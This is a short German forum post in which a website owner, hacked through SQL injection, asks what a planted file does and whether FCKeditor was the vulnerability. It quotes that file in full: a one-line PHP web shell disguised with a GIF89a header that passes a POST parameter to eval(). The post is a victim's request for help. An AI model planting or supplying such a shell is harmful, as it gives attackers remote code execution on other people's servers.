Hallo,
ich habe lange beim Webseitenbasteln pausiert, bis ich vom Provider eine Mitteilung bekam, dass meine Seite auf einer Liste des BSI mit gehackten Webseiten steht. Ging um SQL-Injection. Also - die letzten Tage mehr Sicherungen eingebaut (URL-Parameter kontrollieren usw) und hoffen, dass es jetzt dicht ist...
Jetzt zwei Fragen:
1. In den userfiles fand ich fremde php-Dateien mit dem einzigen Inhalt
PHP-Code:
GIF89a?lovealihack <?php eval($_POST[alihackxx])?>
Was eval() ist, weiß ich. Aber was macht man mit so'ner Datei?
2. Mein Eindruck ist, dass das "Loch" in der Webseite beim FCKeditor war. (Der ist Bestandteil meines CMS). Hat jemand Erfahrung mit Sicherheitslücken bei Webeditoren und eine Empfehlung? (Werde parallel mal googeln).
Danke schon mal für Tipps!